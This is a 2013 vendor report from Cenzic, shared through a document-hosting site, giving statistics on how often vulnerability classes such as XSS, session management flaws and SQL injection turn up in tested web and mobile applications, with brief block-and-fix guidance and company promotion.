Table of Contents. Application Vulnerability Trends Report 2013. Introduction. 99% of Tested Applications Have Vulnerabilities

Similar documents
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Where every interaction matters.

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Cenzic Product Guide. Cloud, Mobile and Web Application Security

SERENA SOFTWARE Serena Service Manager Security

Table of Contents. Page 2/13

WhiteHat Security White Paper. Top 11 PCI DSS 3.0 Changes That Will Affect Your Application Security Program

Attack Vector Detail Report Atlassian

Annex B - Content Management System (CMS) Qualifying Procedure

External Supplier Control Requirements

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

PCI-DSS and Application Security Achieving PCI DSS Compliance with Seeker

05.0 Application Development

Cloud Security:Threats & Mitgations

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Application Security in the Software Development Life Cycle (SDLC) White Paper

How to start a software security initiative within your organization: a maturity based and metrics driven approach OWASP

Information Security Services

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

IBM Security Strategy

Assuring Application Security: Deploying Code that Keeps Data Safe

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Protect the data that drives our customers business. Data Security. Imperva s mission is simple:

Bad Romance: Three Reasons Hackers <3 Your Web Apps & How to Break Them Up

Mean Time to Fix (MTTF) IT Risk s Dirty Little Secret Joe Krull, CPP, CISSP, IAM, CISA, A.Inst.ISP, CRISC, CIPP

Penta Security 3rd Generation Web Application Firewall No Signature Required.

An ICS Whitepaper Choosing the Right Security Assessment

Magento Security and Vulnerabilities. Roman Stepanov

How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis

Securing SharePoint 101. Rob Rachwald Imperva

DFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)

Auditing the Security of an SAP HANA Implementation

Adobe Systems Incorporated

Mitigating Bring Your Own Device (BYOD) Risk for Organisations

of firms with remote users say Web-borne attacks impacted company financials.

Reducing Application Vulnerabilities by Security Engineering

Cyber Security & Data Privacy. January 22, 2014

Rational AppScan & Ounce Products

WAN security threat landscape and best mitigation practices. Rex Stover Vice President, Americas, Enterprise & ICP Sales

A HELPING HAND TO PROTECT YOUR REPUTATION

Application Security in the Software Development Lifecycle

Production Security and the SDLC. Mark Kraynak Sr. Dir. Strategic Marketing Imperva

How to complete the Secure Internet Site Declaration (SISD) form

V ISA SECURITY ALERT 13 November 2015

Protecting Applications on Microsoft Azure against an Evolving Threat Landscape

Leveraging Privileged Identity Governance to Improve Security Posture

Protecting Sensitive Data Reducing Risk with Oracle Database Security

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

THE WEB HACKING INCIDENTS DATABASE 2009

THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS

Security in the smart grid

Password Management Evaluation Guide for Businesses

Threat landscape how are you getting attacked and what can you do better protect yourself and your e-commerce platform

Web Application Penetration Testing

Enterprise Computing Solutions

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services

Process Solutions. Staying Ahead of Today s Cyber Threats. White Paper

Zero Trust Requires Effective Business-Centric Application Segmentation

Staying a step ahead of the hackers: the importance of identifying critical Web application vulnerabilities.

G- Cloud Specialist Cloud Services. Security and Penetration Testing. Overview

Fusing Vulnerability Data and Actionable User Intelligence

SiteLock. Internet Security: Big Threats for Small Business. Presented by: Neill Feather, President

How To Manage Security On A Networked Computer System

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

Security Issues in Cloud Computing

Overview. Figure 1 - Penetration testing screenshot examples showing (i) PACS image and (ii) breached Electronic Health Record system

SecurityMetrics Vision whitepaper

WHITE PAPER. Managed Security. Five Reasons to Adopt a Managed Security Service

Addressing Cyber Security in Oracle Utilities Applications

The Top Web Application Attacks: Are you vulnerable?

Guidelines for Web applications protection with dedicated Web Application Firewall

WEB APPLICATION FIREWALLS: DO WE NEED THEM?

Trend Micro VMware Solution Guide Summary for Payment Card Industry Data Security Standard

National Endowment for the Arts Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement Exit Conference...

2012 Application Security Gap Study: A Survey of IT Security & Developers

El costo oculto de las aplicaciones Vulnerables. Faustino Sanchez. WW Security Sales Enablement. IBM Canada

U.S. Office of Personnel Management. Actions to Strengthen Cybersecurity and Protect Critical IT Systems

NATIONAL CYBER SECURITY AWARENESS MONTH

MatriXay WEB Application Vulnerability Scanner V Overview. (DAS- WEBScan ) The best WEB application assessment tool

Modern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

F5 and Microsoft Exchange Security Solutions

Web Security. Discovering, Analyzing and Mitigating Web Security Threats

WHITE PAPER KEEPING CLIENT AND EMPLOYEE DATA SECURE DRIVES REVENUE AND BUILDS TRUST PROTECTING THE PROTECTOR

Reducing the Cost and Complexity of Web Vulnerability Management

Spigit, Inc. Web Application Vulnerability Assessment/Penetration Test. Prepared By: Accuvant LABS

PCI DSS 3.0 Compliance

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Web Application Report

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

PCI-DSS 3.0 AND APPLICATION SECURITY

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

State of Security Survey GLOBAL FINDINGS

Web App Security Audit Services

How can Content Aware Identity and Access Management give me the control I need to confidently move my business forward?

Whitepaper. Continuous Testing of Production Web Applications

Essential IT Security Testing

Sophistication of attacks will keep improving, especially APT and zero-day exploits

Transcription:

Application Vulnerability Trends Report : 2013

Table of Contents 3 4 5 6 7 8 8 9 10 10 Introduction 99% of Tested Applications Have Vulnerabilities Cross Site Scripting Tops a Long List of Vulnerabilities Detected in 2012 Vulnerability Population Trends for 2013 Session Management Vulnerabilities Appear in 80% of Applications Mobile Vulnerabilities for 2013 Common, Preventable Application Vulnerabilities Common, Detectable Application Vulnerabilities Conclusion About Cenzic PAGE 2 of 10

Introduction In 2013 it s hard to find any organization that isn t routinely sharing sensitive information with customers, suppliers and employees through their Internet and intranet web applications. The business benefits of doing business on the Internet are clear, and the use of web-based applications continues to grow across the board. Many organizations are expanding on this trend by utilizing new cloud and mobile infrastructures, allowing even more sensitive data to live outside of their private networks. While the benefits of web applications are clear, the risks to your organization, brand, applications, and data are more apparent than ever. Every day there are new reports of highly organized cyber attacks on leading websites. High profile victims like The New York Times, Bank of America, and the US Federal Reserve have acknowledged breaches of their systems resulting in theft, espionage, and service interruption. What is less clear is how many companies in total have been breached, including those that are completely unaware of the compromise of their systems. The cost of cybercrime is immense, with some analysts reporting economic losses as high as $1 trillion per year. What s more, the toll on IT and security teams after a breach is significant, as there is a rush to remediate the damage. As you read this report ask important questions about your organization s security and risk profile. Are you aware of the security testing process that s completed on your portfolio of web applications? Do you know what vulnerabilities each of these applications have? What level of risk from application insecurity is acceptable to your business? This paper, based on data collected by the Cenzic Managed Security team, shares details about the kind, frequency and severity of vulnerabilities that will be found in production applications in 2013. Please use this document to understand the current vulnerabilities and risk landscape. And more importantly, use it as a motivation to improve the security posture for your currently deployed apps and to improve your security practices into the future. Please use this document to understand the current vulnerabilities and risk landscape. And more importantly, use it as a motivation to improve your application security posture. PAGE 3 of 10

99% of Tested Applications Have Vulnerabilities First and foremost, 99% of all applications tested in 2012 have one or more serious security vulnerabilities. And with a median number of vulnerabilities per app of 13, it s no wonder that application-level attacks are a focus for hackers. These shocking facts serve as a warning call to all information security and application development personnel: most applications, including yours, are vulnerable to attack. Hackers easily exploit many of these vulnerabilities. More importantly, vulnerabilities translate into risk to your organization, brand, applications and data. But there is good news. Many of these vulnerabilities are also relatively easy for application security teams to detect, block and fix during every phase of the application life cycle. Technologies and processes for reducing application vulnerabilities include secure coding standards, vulnerability scanning, web application firewalls and intrusion detection, among others. The best results come from a multi-layered and coordinated approach that includes technology, processes, employees and a securityoriented corporate culture. The time to act is now, before the risk of an attack turns into a breach. Real breaches can cost your business millions of dollars for material losses, remediation expense and loss of goodwill with customers. The changes required to improve your risk profile are possible with currently available security tools and your existing engineers. While the worldwide shortage of experienced web development engineers may impact the pace of development of new applications, it is no excuse for exposing your organization to excessive security risk by releasing applications with major vulnerabilities. 99% 99% 16 13 2011 2012 2011 2012 Percentage of tested apps with vulnerabilities Median number of vulnerabilities per app Figure 1: 2011-2012 Summary Statistics: Application Vulnerabilities PAGE 4 of 10

Cross Site Scripting Tops a Long List of Vulnerabilities Detected in 2012 At 26% of the total, Cross Site Scripting (XSS) was the most frequently found vulnerability in apps tested in 2012. Quite surprisingly, XSS vulnerabilities rose significantly in 2012 over 2011. Many XSS vulnerabilities are severe and many tested apps have multiple XSS exposure points to remediate. application portfolios. Information Leakage and Session Management Errors follow in frequency, each at 16% of total vulnerabilities found. Authentication and Authorization (13%), Cross Site Request Forgery (CSRF) (8%) SQL Injection (6%), Web Server Version (5%), Remote Code Execution (5%), Web Server Configuration (3%), and Unauthorized Directory Access (2%) round out the 2012 vulnerability population. While XSS leads the list in terms of frequency of occurrence, security professionals are responsible for all vulnerabilities in their Figure 2: 2012 Web Application Security Vulnerability Population PAGE 5 of 10

Vulnerability Population Trends for 2013 In addition to being the largest population of vulnerabilities, XSS is on the rise. The 2012 level of 26% is up significantly from the 2011 level of 17% of detected vulnerabilities. Figure 3: 2011 vs. 2012 Vulnerability Population Trend Figure 3 shows that five categories of vulnerabilities declined in 2012, while five categories increased. While these trends are modestly good news, it is important to remember that vulnerabilities still exist across all categories. Vulnerabilities exist in legacy applications and new applications. And emerging cloud and mobile applications increase the complexity of your security efforts. Moreover, the threats from these vulnerabilities continue to evolve as bad actors experiment with new and different attack strategies. This analysis is instructive of the distribution of vulnerabilities in aggregate. Keep in mind that applications with large numbers of similar vulnerabilities are common. The next section analyzes the vulnerability data from the perspective of application population, providing visibility into the range of vulnerabilities within an application. The above analysis is from the perspective of vulnerability population. All vulnerabilities found during testing were added to the totals. In other words, if an XSS error is found 20 times in a single application, all 20 are counted toward the total. PAGE 6 of 10

Session Management Vulnerabilities Appear in 80% of Applications As mentioned earlier in this report, 99% of applications have one or more vulnerabilities, and the median number of vulnerabilities per tested application is 13. Below is the breakdown of which vulnerabilities classes were found in any single application. Figure 4 shows that Session Management vulnerabilities were detected in 80% of applications tested in 2012, more than any other application vulnerability class. Figure 4: 2011 vs. 2012 Application Vulnerability Class Trend And there s more. XSS vulnerabilities appear in 61% of applications, followed by Authentication and Authorization (45%), Web Server Configuration (28%), CSRF (22%), Information Leakage (17%), SQL Injection (16%), Web Server Version (10%), Unauthorized Directory Access (8%) and Remote Code Execution (3%). Numbers will not add up to 100% as each application can have vulnerabilities in multiple classes. The top conclusion from the application analysis matches the conclusion from the vulnerability population analysis in the previous section: application vulnerabilities are common. The application analysis shows that vulnerabilities aren t limited to a few poorly designed applications; rather they exist in most applications. Both analyses demonstrate that application vulnerabilities are broad in scope and large in number. All vulnerability categories except SQL Injection declined in 2012, suggesting that application teams may be improving their security practices. The increase in detection of SQL Injection vulnerabilities, however, may be due to improvements in the detection tools more than from new deficiencies in security practices. PAGE 7 of 10

Mobile Vulnerabilities for 2013 As mobile handsets and especially smart phones and tablets proliferate, tracking vulnerabilities becomes critical. The Cenzic Managed Services team has discovered the following vulnerabilities during 2012: Common, Preventable Application Vulnerabilities It is important for application developers and administrators to have a thorough knowledge of the common application attacks, the tools available for detecting vulnerabilities and the procedures for fixing applications. Web application security scanning technology is effective at detecting most classes of vulnerabilities. Scanning apps during the development phase of the application lifecycle ensures your development team is following best practices and helps to reduce the cost of corrections. Scanning apps in the production phase is important to ensure secure apps are protected against new threats, and is often the only practical way of cost effectively scanning all applications on a sufficiently regular basis. Cenzic offers a range of solutions to help organizations identify security issues in all phases of the application lifecycle. Most solutions for blocking and fixing application security vulnerabilities fall into one or more of three categories. Coding Practices are techniques used by application developers to deflect potential security breaches. Consistent, high quality coding practices is the most effective deterrent to attacks. Figure 5: 2012 Mobile Application Vulnerability Population Mobile developers need to put extra attention on how data is transferred to and stored on mobile devices as Input Validation (21%), Session Management (11%) and Privacy Violation (25%) combine to account for 57% of mobile vulnerabilities. Storing unencrypted sensitive data on often-lost mobile devices is a significant cause for concern, but the often-unsecured web services commonly associated with mobile applications can pose an even bigger risk. Web Application Firewalls (WAFs) enable policy based blocking of specific vulnerabilities that exist in applications, without rewriting application code. WAFs are a particularly effective method for rapidly blocking a vulnerability found in a production application, without requiring a full re-release of an application containing vulnerabilities. Server Configuration is the range of practices for managing the server hardware, operating systems and security certifications on the devices running the application. Finally, it is important to emphasize that all of these practices are maximally effective when they are part of an enterprise-wide security governance policy. PAGE 8 of 10

Common Detectable Application Vulnerabilities Vulnerability Cross Site Scripting (XSS) Description An application allows attackers to send malicious scripts by relaying the script from an otherwise trusted URL. Block/Fix: coding standards, web application firewall Information Leakage An application inappropriately discloses sensitive data, such as technical details of the application, environment, or userspecific data. Block/Fix: coding standards, web application firewall Session Management An application inappropriately allows attackers to interject themselves as valid website users. Block/Fix: coding standards Authentication & Authorization An application does not properly ensure for unbreachable and unreplayable authentication, and/or authorized access to data and capabilities is not properly enforced on the server side of the application. This includes enforcement of proper encrypted communication of credentials, password standards enforcement, feature and data access ACL enforcement, etc. Block/Fix: server configuration, coding standards Cross Site Request Forgery (CSRF) SQL Injection A vulnerability that allows attackers to send pre-authenticated but unauthorized commands using credentials that the application trusts. Block/Fix: Coding practices, web application firewall An attacker uses various techniques to inject SQL commands to access information that should be inaccessible, such as application data, table structure and error messages. SQL injections can also cause data destruction, planting of malicious data, and infrastructure info leakage. Block/Fix: coding standards, web application firewall Web Server Version Attackers exploit applications, servers and databases through unpatched older versions of server software with known security issues. Block/Fix: server configuration Remote Code Execution An application allows any arbitrary commands to execute on a vulnerable device. Successful exploitation could result in an attacker gaining the same privileges as the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Block/Fix: Coding practices, server configuration Web Server Configuration Unauthorized Directory Access Attackers exploit misconfigured servers or access to server configuration files, enabling further, more sophisticated attacks. Block/Fix: server configuration Access to directory listings should be restricted. Unsecured directories can be traversed, accessed and viewed by an attacker who may be able to access or view the contents of files. Block/Fix: server configuration PAGE 9 of 10

Conclusion Judging from the vulnerabilities found through Cenzic s testing of enterprise-class web and mobile applications, more needs to be done in 2013 to reduce application vulnerabilities, security risk and the specter of successful attacks. While the majority of companies have the important security building blocks, such as firewalls and intrusion protection systems needed for their security infrastructure, not enough organizations have comprehensive practices in place for securing applications. The result is that bad actors are increasingly focusing on and succeeding with application-level attacks. Finally, threats and vulnerabilities change over time. Security is a process, not a once-and-done event. Anticipate future vulnerabilities by planning to re-scan production applications frequently. About Cenzic Cenzic provides the leading application security intelligence platform to continuously assess Cloud, Mobile and Web applications to reduce online security risk. Cenzic s solutions scale from single applications to enterprise-level deployments with hybrid approaches that enable testing of applications at optimal levels. Cenzic helps brands of all sizes protect their reputation and manage security risk in the face of malicious attacks. Cenzic s solutions are used in all parts of the software development lifecycle, and most importantly in production, to protect against new threats even after the application has been deployed. Cenzic s application security intelligence platform is architected to handle web, cloud and mobile applications and is the first to provide risk reduction recommendations for business, application developers and specific applications. Today, Cenzic secures more than half a million online applications and trillions of dollars of commerce for Fortune 1000 companies, all major security companies, government agencies, universities and SMBs. www.cenzic.com PAGE 10 of 10

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information